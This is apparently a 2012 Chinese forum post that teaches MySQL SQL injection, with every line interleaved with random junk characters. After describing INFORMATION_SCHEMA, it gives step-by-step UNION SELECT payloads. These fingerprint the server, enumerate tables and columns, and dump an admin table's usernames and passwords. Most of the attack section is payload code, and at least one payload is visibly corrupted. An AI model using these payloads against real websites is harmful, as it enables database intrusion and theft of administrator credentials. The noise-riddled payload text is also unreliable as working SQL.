本文介绍MYSQL盲注的一些语句和方法
! e+ D0 U4 e' r2 }+ @
# E) x T3 O5 y! I& k学习盲注前先了解下 IFORMATION_SCHEMA 库
" q& P9 u& m9 v h; g. d
* \) P4 H, }7 XMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
0 L/ S& V! g/ W; e9 ?: `存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。) }- \; S6 R4 E% Y( y8 n4 F
1.得到所有数据库名:+ \" m2 }6 W ~. j, p
|SCHEMATA ->存储数据库名的表" E, N: n$ }7 [; B( }5 F
|---字段:SCHEMA_NAME ->数据库名称9 L2 Q5 |9 V `9 Q( p& O
; Q* U3 R$ l; \. m0 p|TABLES ->存储表名 n ?& c! u; q3 F ]2 C
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名2 R S1 G4 F+ ?. Y" x4 Q/ s
|---字段:TABLE_NAME ->存储表的表名: p; h0 T7 h$ Z0 @9 j1 y
* }' Z4 n. n2 r7 z. {|COLUMNS ->存储的字段名表
; h) c6 R7 y% }& j% r/ ?|---字段:TABLE_SCHEMA ->该字段所属数据库名
' @4 O2 _& i/ {( L- s8 g|---字段:TABLE_NAME ->存储所属表的名称
* E5 i: [4 [1 v- H' m
/ [5 D' w% r. o1 E8 M5 u|---字段:COLUMN_NAME ->该字段的名称
3 O2 q6 {3 A' _; l9 g1 M5 [* _) C1 w4 u
; t4 U# o& Z/ o _& V* `
$ ]" D" b- w5 H5 P& J& p8 u###########################################################################
e2 P% u0 y( K: V' e8 u4 R8 r) C' `
0x001 获取系统信息:+ w" z6 i! [8 `% P" E' _
' N6 h, H' p3 W9 n2 Lunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*) `* x# }$ K0 M: g1 K
2 l/ i/ a9 d( d" D
/*5 F! b r. N: e
/ d$ }% A$ L; K& L# w u) e@@global.version_compile_os 获取系统版本6 t- G, L* v6 V3 [4 Z2 a
. Q% O2 \. X8 [, L( ]3 h6 w$ G
@@datadir 数据库路径 Z1 k! {* o$ u' [( \
database() 当前数据库名称
& o* V1 S1 L3 P3 E: @0x3c62723e 换行HEX值
' X2 x @6 W' |7 N+ M& c Y% x8 C/ H7 `: T
*/
8 Z. @# r. p: A1 Q& @* t' Y- Y& o8 D5 c- G4 u2 M* N
, s2 ?* W; L2 i# ~8 ?8 q
* I8 M. ]. C/ b: N& o
######################################################################
7 P) H& n. Z6 T; `# y/ E/ ~. q
4 c8 S9 e* m' c" _0 j9 d" A0x002 获取表名
E! i2 S- K9 [# F" u
9 j+ I: I; ^2 ?$ T$ y, x& S( e; Q, zunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
; \9 E! O' g# I3 z3 u% Y( b; F7 f2 T% B' {. ]8 j9 ]
4 e M o% j; [! }- o
5 l3 a, N4 a: {/*
6 x$ K2 p7 T4 N4 F
. S5 B$ t5 @" k) J/ S! S3 a" A0x67617264656e 为当前数据库名9 T( x' r+ C- [9 ]. D
! E- o% n' M L/ G- I# h* G
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名: m* J. |; ~4 f6 O3 |% \
( u& A u- ]( K* b0 W( z- M*/2 e! ]. g% P; A/ |5 F
& r6 E$ h) O, }9 K
######################################################################
+ b, ~2 q' @! I' p
( y, [/ h, B- Q$ P! l5 N& [% t ; h6 q; l3 ^( {! r9 Z4 p- W- w( y2 T! a
" ^9 ]+ E6 B1 d0 H0x003 获取字段5 z/ [: e' S. a, |( _: o1 E" l- K
% C \+ u6 i4 X( V, G/ n Zunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
) b6 w( A/ c. h% i. ~! W
0 q+ e3 T1 x$ x9 j+ q- h5 M/*) [/ r) o$ k0 J# [
9 g8 _ A5 F& a$ r V& c+ L( ?
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
7 E" T- V% p# x1 j0 Q
; d1 g2 D g7 l5 U* L0x61646d696e ->选择一个表
o, `1 I( \/ @2 e
3 I2 Q. U: }4 g5 p# ?0x67617264656e ->数据库名2 C6 m6 V8 e7 Y3 ?- ~6 A O b
0 [" e' k$ y! p*/
6 d. o( u; D1 U2 n6 N7 s; h
3 E3 O3 r: Z {* O1 z1 {1 X#####################################################################! N: w7 h! Q+ u
! n! ~2 K% R5 r* l2 T' E+ X8 ~2 `
" K& t' N8 a0 G* Z @8 ?1 @
" g- f1 R: D; Z& F- `0x004 获取数据
) `( p5 a9 b( k2 @
, c6 U, l" R0 d. B- A4 vunion select 1,2,3
4 x: K; E+ d, c2 {5 [,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
9 `2 w3 P; m* h2 B: O
" y8 [0 T: `" p3 eunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
1 p3 s& g, I# F7 Z6 ?9 A
1 G7 q* v& p& f% `+ _
7 d5 d% P" ~4 k: i, k
5 o1 T5 V; }2 |/ R" d C/*
% w$ P' F/ I- H7 f0 B
Z( ]5 h2 r A' G# h0x3c62723e 换行符号HEX编码
! A8 F3 g3 y8 x) Y
- o: x: v! o4 P- ^+ j- b2 G; |$ Kgroup_concat 同时获得该字段所有数据' L+ e( e# T. F4 L1 l, H
* v. ^' ~; @* k: c7 W/ G
*/
1 p0 X3 S( t8 t3 L+ u; h
1 d0 s1 C( |. Q& N: h L |
发表于 2012-9-13 17:48:44
收藏
支持
反对